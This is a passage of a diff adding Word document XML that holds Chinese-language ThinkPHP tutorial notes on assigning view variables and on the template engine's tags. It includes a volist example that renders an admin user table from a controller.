+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>模板</w:t>
+            </w:r>
+            <w:r>
+              <w:t>主要参数如下，可以在</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>实例化</w:t>
+            </w:r>
+            <w:r>
+              <w:t>view</w:t>
+            </w:r>
+            <w:r>
+              <w:t>时赋值传入：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="34DB08E8" wp14:editId="397107E9">
+                  <wp:extent cx="3086100" cy="2590800"/>
+                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                  <wp:docPr id="14" name="图片 14"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="1" name=""/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId23"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="3086100" cy="2590800"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6441" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>模板赋值</w:t>
+            </w:r>
+            <w:r>
+              <w:t>：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="a3"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="1"/>
+              </w:numPr>
+              <w:ind w:firstLineChars="0"/>
+            </w:pPr>
+            <w:r>
+              <w:t>调用</w:t>
+            </w:r>
+            <w:r>
+              <w:t>fetch</w:t>
+            </w:r>
+            <w:r>
+              <w:t>方法时传入</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="a3"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="1"/>
+              </w:numPr>
+              <w:ind w:firstLineChars="0"/>
+            </w:pPr>
+            <w:r>
+              <w:t>Assign</w:t>
+            </w:r>
+            <w:r>
+              <w:t>方法赋值</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t xml:space="preserve">// </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>实例化视图类</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:leftChars="200" w:left="420"/>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>$view = new \think\View();</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:leftChars="200" w:left="420"/>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>$view-&gt;assign([</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:leftChars="200" w:left="420"/>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    'name'=&gt;'ThinkPHP',</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:leftChars="200" w:left="420"/>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    'email'=&gt;'thinkphp@qq.com'</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:leftChars="200" w:left="420"/>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    ]);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:leftChars="200" w:left="420"/>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> // </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>模板输出</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:leftChars="200" w:left="420"/>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>return $view-&gt;fetch('index');</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>（</w:t>
+            </w:r>
+            <w:r>
+              <w:t>3</w:t>
+            </w:r>
+            <w:r>
+              <w:t>）</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:t>view</w:t>
+            </w:r>
+            <w:r>
+              <w:t>对象直接赋值</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t xml:space="preserve">   </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">// </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>实例化视图类</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:leftChars="200" w:left="420"/>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>$view = new \think\View();</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:leftChars="200" w:left="420"/>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>$view-&gt;name =   'ThinkPHP';</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:leftChars="200" w:left="420"/>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>$view-&gt;email=   'thinkphp@qq.com';</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:leftChars="200" w:left="420"/>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> // </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>模板输出</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:leftChars="200" w:left="420"/>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>return $view-&gt;fetch('index');</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>模板</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>ThinkPHP</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>内置了一个基于</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>XML</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>的性能卓越的模板引擎，这是一个专门为</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>ThinkPHP</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>服务的内置模板引擎，使用了</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>XML</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>标签库技术的编译型模板引擎，支持两种类型的模板标签，使用了动态编译和缓存技术，而且支持自定义标签库</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="a3"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="2"/>
+              </w:numPr>
+              <w:ind w:firstLineChars="0"/>
+            </w:pPr>
+            <w:r>
+              <w:t>普通标签</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t xml:space="preserve">  </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>普通标签用于变量输出和模板注释，普通模板标签默认以</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t xml:space="preserve">{ </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>和</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> } </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>作为开始和结束标识</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="a3"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="2"/>
+              </w:numPr>
+              <w:ind w:firstLineChars="0"/>
+            </w:pPr>
+            <w:r>
+              <w:t>标签库标签</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t xml:space="preserve">   </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>标签库标签可以用于模板变量输出、文件包含、条件控制、循环输出等功能，而且完全可以自己扩展功能</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>。</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>普通模板标签默认以</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t xml:space="preserve">{ </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>和</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> } </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>作为开始和结束标识</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6441" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>模板</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>示例</w:t>
+            </w:r>
+            <w:r>
+              <w:t>：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t xml:space="preserve">  </w:t>
+            </w:r>
+            <w:r>
+              <w:t>V</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>iew</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>端</w:t>
+            </w:r>
+            <w:r>
+              <w:t>：</w:t>
+            </w:r>
+            <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+            <w:bookmarkEnd w:id="0"/>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">&lt;table align="center"  width="70%" border="1" </w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t>&lt;tr&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t>&lt;td&gt;&lt;b&gt;</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>管理员编号</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>&lt;/b&gt;&lt;/td&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t>&lt;td&gt;&lt;b&gt;</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>管理员名称</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>&lt;/b&gt;&lt;/td&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t>&lt;td&gt;&lt;b&gt;</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>管理员邮箱</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>&lt;/b&gt;&lt;/td&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t>&lt;/tr&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t>{volist name="</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t>result</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>" id="row"}</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">  //volist</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>用于</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>循环输出，类似</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>foreach</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t>&lt;tr&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t>&lt;td align="center"&gt;{$row.id}&lt;/td&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t>&lt;td&gt;{$row.username}&lt;/td&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t>&lt;td&gt;{$row.email}&lt;/td&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t>&lt;/tr&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t>{/volist}</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> &lt;/table&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:firstLineChars="100" w:firstLine="210"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>控制器端</w:t>
+            </w:r>
+            <w:r>
+              <w:t>：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:firstLineChars="350" w:firstLine="735"/>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>$user=D("barret/User");</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:firstLineChars="100" w:firstLine="210"/>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t>$result=$user-&gt;admin();</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:firstLineChars="100" w:firstLine="210"/>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t>$view=new \think\View();</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:firstLineChars="100" w:firstLine="210"/>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t>$view-&gt;assign("</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t>result</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>",$result);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:firstLineChars="100" w:firstLine="210"/>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
